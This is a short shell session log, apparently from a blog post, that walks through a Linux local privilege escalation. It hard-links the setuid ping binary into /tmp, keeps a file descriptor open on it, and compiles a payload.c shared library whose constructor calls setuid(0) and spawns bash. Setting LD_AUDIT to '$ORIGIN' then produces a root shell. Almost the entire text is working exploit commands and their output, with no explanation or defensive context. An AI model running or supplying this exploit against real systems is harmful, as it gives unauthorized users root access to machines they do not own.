[Star@localhost tmp]$ ls -ld /tmp/
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[Star@localhost tmp]$ cd /tmp/
[Star@localhost tmp]$ mkdir exploit
[Star@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[Star@localhost tmp]$ exec 3< /tmp/exploit/target
[Star@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[Star@localhost tmp]$ rm -fr /tmp/exploit/
[Star@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[Star@localhost tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[Star@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[Star@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[Star@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[Star@localhost tmp]# whoami
root
阅读(2018) | 评论(0) | 转发(0) |